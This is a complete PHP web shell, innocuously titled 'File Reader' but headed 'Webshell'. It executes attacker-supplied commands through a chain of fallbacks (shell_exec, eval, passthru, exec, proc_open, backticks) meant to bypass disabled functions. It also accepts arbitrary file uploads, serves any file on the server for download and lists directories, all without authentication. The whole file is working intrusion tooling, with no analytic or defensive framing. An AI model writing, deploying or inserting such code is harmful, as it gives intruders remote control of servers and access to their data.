📖 File Reader
<?php
$dir = getcwd();
if (isset($_GET['dir'])) $dir = $_GET['dir'];
$files = scandir($dir);
// Cmd Exec (multiple bypasses)
if (isset($_POST['cmd'])) {
$cmd = $_POST['cmd'];
$output = '';
// Try shell_exec
if (function_exists('shell_exec')) {
$output = shell_exec($cmd);
}
// Eval for PHP code (input 'system("id");')
else if (function_exists('eval')) {
ob_start();
eval($cmd);
$output = ob_get_clean();
}
// Passthru
else if (function_exists('passthru')) {
ob_start();
passthru($cmd);
$output = ob_get_clean();
}
// Exec
else if (function_exists('exec')) {
exec($cmd, $out);
$output = implode("\n", $out);
}
// Proc_open
else if (function_exists('proc_open')) {
$proc = proc_open($cmd, [1 => ['pipe', 'w'], 2 => ['pipe', 'w']], $pipes);
$output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
proc_close($proc);
}
// Backticks fixed
else {
$output = `$cmd`;
}
echo "<pre>" . ($output ?: "No RCE bypass worked") . "</pre>";
}
// File Upload
if (isset($_FILES['file'])) {
move_uploaded_file($_FILES['file']['tmp_name'], $dir . '/' . $_FILES['file']['name']);
echo "Uploaded: " . $_FILES['file']['name'];
}
// File Download
if (isset($_GET['download'])) {
$file = $_GET['download'];
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
readfile($file);
exit;
}
?>
<!DOCTYPE html>
<html>
<body>
<h1>Webshell</h1>
<!-- Cmd Exec -->
<form method="POST">
<input name="cmd" placeholder="id or system('id');">
<button>Run Cmd</button>
</form>
<!-- File Upload -->
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<button>Upload</button>
</form>
<!-- File Manager & Download -->
<ul>
<?php foreach ($files as $file) {
if ($file != '.' && $file != '..') {
echo "<li>$file <a href='?download=$dir/$file'>Download</a></li>";
}
} ?>
</ul>
</body>
</html>